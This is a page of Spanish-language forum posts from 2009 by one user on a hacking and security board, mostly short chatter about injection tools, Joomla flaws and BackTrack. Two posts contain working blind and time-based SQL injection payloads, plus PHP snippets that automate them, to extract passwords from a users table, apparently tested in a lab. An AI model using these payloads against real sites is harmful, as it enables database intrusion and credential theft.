elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 [14] 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
131  Seguridad Informática / Nivel Web / Re: SqlInyection Tools JDA v1.0(beta) by Jbyte version 2009 en: 18 Febrero 2009, 03:41 am
Muy sencilla la tool, pero con muchas fallas

a) Romple el programa si son mas de 12 campos (no siempre)
c) Siempre hay que ir al menu de "Nueva Injeccion" para iniciar otra nueva.
d) Injection a ciegas?

PD: Se puede mejorar bastante.

-berz3k.

PD: Moderador moverlo a Bug Exploits -> Nivel Web

132  Seguridad Informática / Hacking / Re: Certified Penetration Testing Specialist en: 17 Febrero 2009, 19:55 pm
@Bht Sata

Avisa cuando esten listas las descargas ese RP realmente s0x.

-berz3k.
133  Seguridad Informática / Nivel Web / Re: Múltiples fallas en Joomla 1.5.9 en: 13 Febrero 2009, 20:20 pm
@alakentu, la gran magia del

Código:
jexit(JText::_('JINVALID_TOKEN'));

-berz3k

PD: Voy a probar el fix
134  Seguridad Informática / Nivel Web / Re: Caso #01 : Blind SQL Inyection Con Descarga Forzada. en: 13 Febrero 2009, 19:40 pm
Es verdad mi QUERY es un blind normal via GET + ASCII etc, mas no estoy utlizando la injection via "Content-Disposition:"

Código:
HTTP/1.1 200 OK
Server: test
content-disposition: attachment; filename=test.html <- AQUI INJECTION
Content-length: 16
Content-Type: application/octet-strea

configurare algun ejemplo de descarga forzada en mi LAB, mmm pero para ello necesito un ejemplo real y así observare mejor los detalles OzX

a) Estoy funcionara tanto para win32 como Linux? si no es así, sigamos con el HILO y posteando mas pruebas.
b) Estoy mirando los archivos configs para Linux  y win32 para crear un HEADER que force el CONTENT-DISPOSITION, OzX o si lo tenes ya ahorrarme el trabajo XD

mandame un msg private please!


-berz3k.

135  Seguridad Informática / Hacking / Re: Certified Penetration Testing Specialist en: 13 Febrero 2009, 19:26 pm
Joder llevo esperando mas de 15 dias, no termino de bajar grrr, me urge una cuenta RP premium :-(

-berz3k.
136  Seguridad Informática / Nivel Web / Re: usa.kaspersky.com hacked … full database acces , sql injection en: 13 Febrero 2009, 10:17 am
Joder! , como que kaspersky hacked? mmmm bueno me tranquilizo por que no uso AV, pero que no jodan! via SQLi XD

-berz3k.
137  Seguridad Informática / Nivel Web / Re: Problemas con Time-based Blind SQLI , Obtencion de Minusculas y Mayusculas en: 11 Febrero 2009, 08:11 am
@OzX

Yep. tambien elimine los "nulls" no necesarios, algo me falta..., ando metido en muchas cosas, espero fixear parte de tu code en esta semana, seguramente me lo fixeas antes tu XD, es el mismo proposito pero sin usar el ASCII(substring etc etc) ya que tomara los arrays de tu code, que previamente haz declarado para MAYUSCULAS, MINUSCULAS, chars etc.

-berz3k.
138  Seguridad Informática / Nivel Web / Re: Problemas con Time-based Blind SQLI , Obtencion de Minusculas y Mayusculas en: 10 Febrero 2009, 21:53 pm
Me gusta tu code PHP te ha quedado muy wuapo, sin embargo estoy trasteando cada vez mas en PHP, ahora el string a testear es el siguiente (manualmente) :

Código:
http://x.x.x.x/blind.php?id=1+AND+ascii(substring((SELECT+password+FROM+users+where+id=1),7,1))=95
http://x.x.x.x/blind.php?id=1+AND+ascii(substring((SELECT+password+FROM+users+where+id=1),7,1))=96
http://x.x.x.x/blind.php?id=1+AND+ascii(substring((SELECT+password+FROM+users+where+id=1),7,1))=97

Para solo cuestiones de prueba y ver su funcionamiento en PHP a traves de tu code he intentado algunas cosas, vaya que lo tengo hecho en PERL y me funciona correctamente, pero me estoy enamorando de PHP por su facilidad de programar XD

Segun yo, y solo para pruebas podria ser:
Código:
$source = GET("http://x.x.x.x/blind.php?id=1+UNION+SELECT+IF+(SUBSTRING(group_concat(user,0x5F,password),".$limit.",1)/**/=/**/CHAR(%22".$char."%22),BENCHMARK(1500000,MD5(CHAR(1))),null)+from+users+limit+0,1/*");

o Tambien
Código:
$source = GET("http://x.x.x.x/blind.php?id=1+UNION+SELECT+IF+(SUBSTRING(group_concat(user,0x5F,password),".$limit.",1)/**/=/**/CHAR(%22".$char."%22),BENCHMARK(1500000,MD5(CHAR(1))))+from+users+limit+0,1/*");

Mmm algo anda mal, probare mas tarde, ideas OzX?

Ejempo TABLA
Código:
+++++++++++++++++++++++++++++++++++++++++
| users |
+++++++++++++++++++++++++++++++++++++++++
| id |      name | password |
+++++++++++++++++++++++++++++++++++++++++
|  1 | administrator | 1234%&_ |
|  2 |  | |
|  3 |  | |
+++++++++++++++++++++++++++++++++++++++++

Aunque podria agregar la funcion ASCII(SUBSTRING etc etc)+from+users, pero no tendria caso los arrays que declaro OzX.

-berz3k.







139  Seguridad Informática / Nivel Web / Re: Caso #01 : Blind SQL Inyection Con Descarga Forzada. en: 10 Febrero 2009, 20:12 pm
@OzX

Probando el script que haz enviado no me va, mi string manual es este:

Código:
http://1.1.1.1/blind.php?id=1+AND+ascii(substring((SELECT+password+FROM+users+where+id=1),2,1))=50
http://1.1.1.1/blind.php?id=1+AND+ascii(substring((SELECT+password+FROM+users+where+id=1),2,1))=51
http://1.1.1.1/blind.php?id=1+AND+ascii(substring((SELECT+password+FROM+users+where+id=1),2,1))=52
[/snip...]


Var dentro del code quedo así (algo falta):

Código:
$url="http://1.1.1.1/blind.php?id=1+AND+ascii(substring((".$sql."),".$substring.",1))=".$ascii[$x];

Ejecucion:

Código:
C:\>php -f blind-forzado.php

-berz3k.

140  Seguridad Informática / Hacking / Re: Backtrack 4 beta en: 10 Febrero 2009, 19:27 pm
Mmmm a de ser un FAKE, aun asi ya lo estoy descargando.

-berz3k.
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 [14] 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines